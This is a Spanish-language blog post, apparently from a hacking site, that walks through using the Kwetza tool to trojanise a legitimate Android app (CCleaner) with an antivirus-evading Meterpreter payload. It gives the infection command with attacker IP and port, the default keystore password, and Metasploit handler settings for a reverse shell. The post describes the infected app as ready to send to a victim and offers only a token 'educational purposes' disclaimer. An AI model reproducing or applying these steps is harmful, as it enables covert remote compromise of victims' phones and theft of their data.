Hacking Ético, Seguridad Informática, Redes, RedTeam

domingo, 11 de junio de 2017

Kwetza Infectar Aplicaciones Android

6/11/2017 11:17:00 p. m. Posted by Secpronet No hay comentarios

Kwetza Infectar Aplicaciones Android


¿Qué hace?

Kwetza infecta una aplicación para Android existente con cualquiera de las plantillas de encargo o de carga útil por defecto para evitar ser detectados por los antivirus. Kwetza le permite infectar aplicaciones Android usando permisos predeterminados de la aplicación de destino o se inyecta permisos adicionales para obtener una funcionalidad adicional.

¿Cómo se instala?

Primero colonas o descargamos la herramienta. https://github.com/sensepost/kwetza.git una vez clonada la herramienta procederemos a instalarla.

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar utilizando Pip:

pip install beautifulsoup4

Cabe mencionar que la herramienta necesita apktool para su funcionamiento, lo aremos de la siguiente forma. vamos a la pagina para descargarlo apktool una vez descargada la última versión  procedemos a descargar el siguiente archivo link lo guardamos como .txt "apktool.txt" el archivo .jar descargado lo remombraremos y le pondremos apktool.jar 



una  vez hecho esto lo copiamos a la siguiente ruta: /usr/local/bin luego daremos permisos a ambos archivos. 


una vez hecho todo esto procedemos a ejecutar la herramienta abrimos una terminal y desde donde la clonamos o descargamos tecleamos lo siguiente. el comando para lanzar la aplicación es la siguiente:
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no 
solo sustituiremos valores de la siguiente forma: python kwetza.py ccleaner.apk 192.168.1.10 4444 yes ccleaner es la aplicación que yo elegí mi ip y el puerto a la escucha el "si " es para darle permisos adicionales a la aplicación final.


una vez hecho esto esperamos que la aplicación haga su trabajo hasta que te llegue hasta la siguiente linea Passphrase for keystore: la contraseña por defecto es "password".


una vez terminado el proceso ya tendremos la aplicación lista para mandársela a la victima  "recuerden  esto es con fines educativos" la aplicación se guardara en la siguiente ruta: 
/root/Herramientas/kwetza/ccleaner/dist/ccleaner.apk "allí fue donde yo la instale y la aplicación que use" esto variara dependiendo de donde la guardaron. 



ya realizado todo esto procedemos a configurar Metasploit, 

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10 "nuestra ip" 
set lport 4444  "el que usamos para configurar la apk"


una vez hecho esto pues ponemos a la escucha nuestro payload  por tener la sesión exitosa. Como vemos tenemos una sesión de meterpreter exitosa.



ya con esto que vuele nuestra mente recuerden es con fines educativos.